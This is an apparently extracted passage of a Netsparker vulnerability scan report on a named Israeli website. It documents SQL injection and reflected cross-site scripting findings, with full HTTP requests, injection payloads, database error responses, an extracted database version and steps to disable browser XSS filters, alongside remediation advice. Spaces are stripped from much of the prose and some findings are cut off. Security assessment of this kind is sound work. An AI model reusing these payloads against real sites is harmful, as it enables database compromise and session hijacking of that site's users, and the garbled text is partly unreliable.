Thisisanextremelycommonvulnerabilityanditssuccessfulexploitationcanhavecriticalimplications.
{PRODUCT}confirmedthevulnerabilitybyexecutingatestSQLqueryonthebackenddatabase.
ImpactDependingonthebackenddatabase,thedatabaseconnectionsettingsandtheoperatingsystem,anattackercanmountoneormoreofthefollowingtypeofattackssuccessfully:
Reading,updatinganddeletingarbitrarydataortablesfromthedatabaseExecutingcommandsontheunderlyingoperatingsystem
Actions to Take1. Seetheremedyforsolution.2. Ifyouarenotusingadatabaseaccesslayer(DAL),considerusingone.Thiswillhelpyoucentralizetheissue.YoucanalsouseORM(object relational
mapping).MostoftheORMsystemsuseonlyparameterizedqueriesandthiscansolvethewholeSQLinjectionproblem.3. LocateallofthedynamicallygeneratedSQLqueriesandconvertthemtoparameterizedqueries.(If you decide to use a DAL/ORM, change all legacy
code to use these new libraries.)4. Useyourweblogsandapplicationlogstoseeiftherewereanypreviousbutundetectedattackstothisresource.
RemedyArobustmethodformitigatingthethreatofSQLinjection-basedvulnerabilitiesistouseparameterizedqueries(prepared statements).Almostallmodernlanguagesprovidebuilt-inlibrariesforthis.Whereverpossible,donotcreatedynamicSQLqueriesorSQLquerieswithstringconcatenation.
Required Skills for Successful ExploitationTherearenumerousfreelyavailabletoolstoexploitSQLinjectionvulnerabilities.Thisisacomplexareawithmanydependencies;however,itshouldbenotedthatthenumerousresourcesavailableinthisareahaveraisedbothattackerawarenessoftheissuesandtheirabilitytodiscoverandleveragethem.SQLinjectionisoneofthemostcommonwebapplicationvulnerabilities.
External ReferencesOWASPSQLinjectionSQLinjectionCheatsheet
Remedy ReferencesMSDN-ProtectFromSQLinjectioninASP.NET
ClassificationOWASPA1PCIv1.2-6.5.2PCIv2.0-6.5.1CWE-89CAPEC-66WASC-19
1.1. /contact/ CONFIRMEDhttp://www.shalomlaam.co.il/contact/
ParametersParameter Type Value
action POST contact
f_name POST Smith
mail POST
message POST 3
name POST Smith
name_id POST convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))
phone POST 3
sendFrom POST 3
subject POST 3
11 / 146
Extracted Datamicrosoft sql server 2005 - 9.00.3042.00 (intel x86) feb 9 2007 22:47:07 copyright (c) 1988-2005 microsoft corporation express edition onwindows nt 5.2 (build 3790: service pack 2)
RequestPOST /contact/ HTTP/1.1Referer: http://www.shalomlaam.co.il/contact/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 258Accept-Encoding: gzip, deflate
action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&phone=3&sendFrom=3&subject=3
Response"Arial" size=2>Microsoft OLE DB Provider for SQL Server error '80040e07'Conversion failed when converting thevarchar value '_!@2dilemma' to data type int./contact/Default.asp, line 46
12 / 146
9 TOTALCRITICAL
2. [Probable] SQL InjectionSQLInjectionoccurswhendatainputforexamplebyauserisinterpretedasaSQLcommandratherthannormaldatabythebackenddatabase.Thisisanextremelycommonvulnerabilityanditssuccessfulexploitationcanhavecriticalimplications.EventhoughNetsparkerbelievesthatthereisaSQLInjectioninhereitcould not confirmit.TherecanbenumerousreasonsforNetsparkernotbeingabletoconfirmthis.WestronglyrecommendinvestigatingtheissuemanuallytoensurethatitisanSQLInjectionandthatitneedstobeaddressed.Youcanalsoconsidersendingthedetailsofthisissuetous,inorderthatwecanaddressthisissueforthenexttimeandgiveyouamorepreciseresult.
{PRODUCT}identifiedaprobableSQLinjection,whichoccurswhendatainputbyauserisinterpretedasanSQLcommandratherthanasnormaldatabythebackenddatabase.
Thisisanextremelycommonvulnerabilityanditssuccessfulexploitationcanhavecriticalimplications.
Eventhough{PRODUCT}believesthereisaSQLinjectioninhere,itcould not confirmit.Therecanbenumerousreasonsfor{PRODUCT}notbeingabletoconfirmthis.WestronglyrecommendinvestigatingtheissuemanuallytoensureitisanSQLinjectionandthatitneedstobeaddressed.Youcanalsoconsidersendingthedetailsofthisissuetoussowecanaddressthisissueforthenexttimeandgiveyouamorepreciseresult.
ImpactDependingonthebackenddatabase,databaseconnectionsettingsandtheoperatingsystem,anattackercanmountoneormoreofthefollowingtypeofattackssuccessfully:
Reading,updatinganddeletingarbitrarydata/tablesfromthedatabase.Executingcommandsontheunderlyingoperatingsystem.
Actions to Take1. Seetheremedyforsolution.2. Ifyouarenotusingadatabaseaccesslayer(DAL)withinthearchitectureconsideritsbenefitsandimplementifappropriate.Asaminimumtheuseof
sDALwillhelpcentralizetheissueanditsresolution.YoucanalsouseORM(object relational mapping).MostORMsystemsuseparameterizedqueriesandthiscansolvemanyifnotallSQLinjectionbasedproblems.
3. LocateallofthedynamicallygeneratedSQLqueriesandconvertthemtoparameterizedqueries.(If you decide to use a DAL/ORM, change all legacycode to use these new libraries.)
4. Monitorandreviewweblogsandapplicationlogstouncoveractiveorpreviousexploitationattempts.
RemedyAveryrobustmethodformitigatingthethreatofSQLinjection-basedvulnerabilitiesistouseparameterizedqueries(prepared statements).Almostallmodernlanguagesprovidebuilt-inlibrariesforthis.Whereverpossible,donotcreatedynamicSQLqueriesorSQLquerieswithstringconcatenation.
Required Skills for Successful ExploitationTherearenumerousfreelyavailabletoolstotestforSQLinjectionvulnerabilities.Thisisacomplexareawithmanydependencies;however,itshouldbenotedthatthenumerousresourcesavailableinthisareahaveraisedbothattackerawarenessoftheissuesandtheirabilitytodiscoverandleveragethem.SQLinjectionisoneofthemostcommonwebapplicationvulnerabilities.
External ReferencesOWASPSQLinjectionSQLinjectionCheatSheet
Remedy ReferencesSQLinjectionPreventionCheatSheetMSDN-ProtectFromSQLinjectioninASP.NETOWASPPreventingSQLinjectioninJavaPreparedStatementsandStoredProceduresinPHP
ClassificationOWASPA1PCIv1.2-6.5.2PCIv2.0-6.5.1CWE-89CAPEC-66WASC-19
13 / 146
2.1. /contact/http://www.shalomlaam.co.il/contact/
ParametersParameter Type Value
action POST contact
f_name POST Smith
mail POST
message POST 3
name POST Smith
name_id POST 0
phone POST 3
sendFrom POST -1 or 1=1 and (select 1 and row(1,1)>(selectcount(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))xfrom (select 1 union select 2)a group by xlimit 1))
subject POST 3
Certainty
RequestPOST /contact/ HTTP/1.1Referer: http://www.shalomlaam.co.il/contact/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 438Accept-Encoding: gzip, deflate
action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=0&phone=3&sendFrom=-1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&subject=3
Responsesrc="pic/logo.jpg" width="130" height="130" alt="" />-->
Microsoft OLE DB Provider for SQL Server error '80040e57'String or binary data would betruncated./contact/Default.asp, line 46
2.2. /contact/http://www.shalomlaam.co.il/contact/
ParametersParameter Type Value
action POST contact
f_name POST Smith
mail POST
message POST 3
name POST -1 or 1=1 and (select 1 and row(1,1)>(selectcount(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))xfrom (select 1 union select 2)a group by xlimit 1))
name_id POST 0
phone POST 3
sendFrom POST 3
subject POST 3
Certainty
RequestPOST /contact/ HTTP/1.1Referer: http://www.shalomlaam.co.il/contact/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 434Accept-Encoding: gzip, deflate
action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=-1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&name_id=0&phone=3&sendFrom=3&subject=3
Responsesrc="pic/logo.jpg" width="130" height="130" alt="" />-->
Microsoft OLE DB Provider for SQL Server error '80040e57'String or binary data would betruncated./contact/Default.asp, line 46
2.3. /contact/http://www.shalomlaam.co.il/contact/
ParametersParameter Type Value
action POST contact
f_name POST Smith
mail POST
message POST 3
name POST Smith
name_id POST 0
phone POST (selectconvert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
sendFrom POST 3
subject POST 3
Certainty
RequestPOST /contact/ HTTP/1.1Referer: http://www.shalomlaam.co.il/contact/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 289Accept-Encoding: gzip, deflate
action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=0&phone=(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20syscolumns)&sendFrom=3&subject=3
Responsesrc="pic/logo.jpg" width="130" height="130" alt="" />-->
Microsoft OLE DB Provider for SQL Server error '80040e57'String or binary data would betruncated./contact/Default.asp, line 46
2.4. /contact/http://www.shalomlaam.co.il/contact/
ParametersParameter Type Value
action POST contact
f_name POST Smith
mail POST
message POST 3
name POST Smith
name_id POST 0
phone POST 3
sendFrom POST 3
subject POST -1 or 1=1 and (select 1 and row(1,1)>(selectcount(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))xfrom (select 1 union select 2)a group by xlimit 1))
Certainty
RequestPOST /contact/ HTTP/1.1Referer: http://www.shalomlaam.co.il/contact/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 438Accept-Encoding: gzip, deflate
action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=0&phone=3&sendFrom=3&subject=-1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))
Responsesrc="pic/logo.jpg" width="130" height="130" alt="" />-->
Microsoft OLE DB Provider for SQL Server error '80040e57'String or binary data would betruncated./contact/Default.asp, line 46
2.5. /reg/http://www.shalomlaam.co.il/reg/
ParametersParameter Type Value
action POST add
bpdf POST 1
btn1 POST
email POST (selectconvert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
f_name POST Smith
name POST Smith
phone POST 3
radio POST alon
Certainty
RequestPOST /reg/ HTTP/1.1Referer: http://www.shalomlaam.co.il/reg/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 270Accept-Encoding: gzip, deflate
action=add&bpdf=1&btn1=%ef%bf%bd%ef%bf%bd%ef%bf%bd&email=(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20syscolumns)&f_name=Smith&name=Smith&phone=3&radio=alon
Responseyle="background:url('images/kiv.gif') repeat-x; width:100%; height:2px;">
Microsoft OLE DB Provider for SQL Server error '80040e57'String or binary data would betruncated./reg/Default.asp, line 28
2.6. /contact/http://www.shalomlaam.co.il/contact/
ParametersParameter Type Value
action POST contact
f_name POST -1 or 1=1 and (select 1 and row(1,1)>(selectcount(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))xfrom (select 1 union select 2)a group by xlimit 1))
mail POST
message POST 3
name POST Smith
name_id POST 0
phone POST 3
sendFrom POST 3
subject POST 3
18 / 146
Certainty
RequestPOST /contact/ HTTP/1.1Referer: http://www.shalomlaam.co.il/contact/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 434Accept-Encoding: gzip, deflate
action=contact&f_name=-1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=0&phone=3&sendFrom=3&subject=3
Responsesrc="pic/logo.jpg" width="130" height="130" alt="" />-->
Microsoft OLE DB Provider for SQL Server error '80040e57'String or binary data would betruncated./contact/Default.asp, line 46-->
Microsoft OLE DB Provider for SQL Server error '80040e14'Incorrect syntax near '27'./contact/Default.asp, line 46
19 / 146
2.8. /lessons/http://www.shalomlaam.co.il/lessons/
ParametersParameter Type Value
action POST search
yom POST '+ (selectconvert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
snif POST 3
subjects POST 0
Certainty
RequestPOST /lessons/ HTTP/1.1Referer: http://www.shalomlaam.co.il/lessons/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 220Accept-Encoding: gzip, deflate
action=search&yom='%2b%20(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20syscolumns)%20%2b'&snif=3&subjects=0
Responsetd>
Microsoft OLE DB Provider for ODBC Drivers error '80040e37'[Microsoft][ODBC Excel Driver]The Microsoft Jet database engine could not find the object 'syscolumns'. Make s
2.9. /lessons/default.asphttp://www.shalomlaam.co.il/lessons/default.asp
ParametersParameter Type Value
action POST search
yom POST '+ (selectconvert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
snif POST 3
subjects POST 0
Certainty
RequestPOST /lessons/default.asp HTTP/1.1Referer: http://www.shalomlaam.co.il/lessons/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 220Accept-Encoding: gzip, deflate
action=search&yom='%2b%20(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20syscolumns)%20%2b'&snif=3&subjects=0
20 / 146
Responsetd>
Microsoft OLE DB Provider for ODBC Drivers error '80040e37'[Microsoft][ODBC Excel Driver]The Microsoft Jet database engine could not find the object 'syscolumns'. Make s
21 / 146
150 TOTALIMPORTANTCONFIRMED
150
3. Cross-site ScriptingXSS(Cross-siteScripting)allowsanattackertoexecuteadynamicscript(Javascript, VbScript)inthecontextoftheapplication.Thisallowsseveraldifferentattackopportunities,mostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuser'scredentials.ThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTML/Javascript/VbScriptbythebrowser.
XSStargetstheusersoftheapplicationinsteadoftheserver.Althoughthisisalimitation,sinceitallowsattackerstohijackotherusers'session,anattackermightattackanadministratortogainfullcontrolovertheapplication.
{PRODUCT}detectedcross-sitescripting,whichallowsanattackertoexecuteadynamicscript(JavaScript, VBScript)inthecontextoftheapplication.
Thisallowsseveraldifferentattackopportunities,mostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuser'scredentials.ThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTML/JavaScript/VBScriptbythebrowser.Cross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserver.Althoughthisisalimitation,sinceitallowsattackerstohijackotherusers'sessions,anattackermightattackanadministratortogainfullcontrolovertheapplication.
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofcross-sitescripting,including:
Hijackinguser'sactivesession.Mountingphishingattacks.Interceptingdataandperformingman-in-the-middleattacks.
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTML,JavaScriptorVBScript.Toavoidthis,outputshouldbeencodedaccordingtotheoutputlocationandcontext.Forexample,iftheoutputgoesintoaJavaScriptblockwithintheHTMLdocument,thenoutputneedstobeencodedaccordingly.Encodingcangetverycomplex,thereforeit'sstronglyrecommendedtouseanencodinglibrarysuchasOWASPESAPIandMicrosoftAnti-cross-sitescripting.
Remedy ReferencesMicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
Proof of Concept NotesGeneratedXSSexploitmightnotworkduetobrowserXSSfiltering.PleasefollowtheguidelinesbelowinordertodisableXSSfilteringfordifferentbrowsers.Alsonotethat;
XSSfilteringisafeaturethat'senabledbydefaultinsomeofthemodernbrowsers.Itshouldonlybedisabledtemporarilytotestexploitsandshouldberevertedbackifthebrowserisactivelyusedotherthantestingpurposes.EventhoughbrowsershavecertaincheckstopreventCross-sitescriptingattacksinpracticethereareavarietyofwaystobypassthismechanismthereforeawebapplicationshouldnotrelyonthiskindofclient-sidebrowserchecks.
Chrome
Opencommandprompt.Gotofolderwherechrome.exeislocated.Runthecommandchrome.exe --args --disable-xss-auditor
InternetExplorer
ClickTools->InternetOptionsandthennavigatetotheSecurityTab.ClickCustomlevelandscrolltowardsthebottomwhereyouwillfindthatEnableXSSfilteriscurrentlyEnabled.Setittodisabled.ClickOK.ClickYestoacceptthewarningfollowedbyApply.
Firefox
Gotoabout:configintheURLaddressbar.Inthesearchfield,typeurlbar.filterandfindbrowser.urlbar.filter.javascript.Setitsvaluetofalsebydoubleclickingtherow.
ClassificationOWASPA2PCIv1.2-6.5.1PCIv2.0-6.5.7CWE-79CAPEC-19WASC-08
22 / 146
3.1. /allvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/allvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3..
ParametersParameter Type Value
URI-BASED Full URL '"-->alert(0x0001D1)
RequestGET /allvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D1)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:48:00 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 169Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/allvideo/'"-->netsparker(0x0001D1)script>style>alert(0x00049B)
23 / 146
RequestPOST /contact/reg/maillingUpdate.asp?'"-->netsparker(0x00049B) HTTP/1.1Referer: http://www.shalomlaam.co.il/contact/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 37Accept-Encoding: gzip, deflate
emailtonews=netsparker%40example.com&
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:03:14 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 191Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/contact/reg/maillingUpdate.asp?'"-->netsparker(0x00049B)script>style>
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:47:53 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 169Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/bmidrash/'"-->netsparker(0x0001C7)script>style>netsparker(0x0001CE)script>style>
3.8. /news'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B7)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/news'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B7)%3C/scr..
ParametersParameter Type Value
URI-BASED Full URL '"-->alert(0x0001B7)
RequestGET /news'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001B7)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:47:29 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 164Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/news'"-->netsparker(0x0001B7)script>style>
3.10. /js/delate_image.asp CONFIRMEDhttp://www.shalomlaam.co.il/js/delate_image.asp?'"-->alert(0x0003D6)
ParametersParameter Type Value
field GET picture_
Query Based Query String '"-->alert(0x0003D6)
RequestGET /js/delate_image.asp?'"-->netsparker(0x0003D6) HTTP/1.1Referer: http://www.shalomlaam.co.il/js/func_site.jsAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:00:30 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 180Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/delate_image.asp?'"-->netsparker(0x0003D6)script>style>
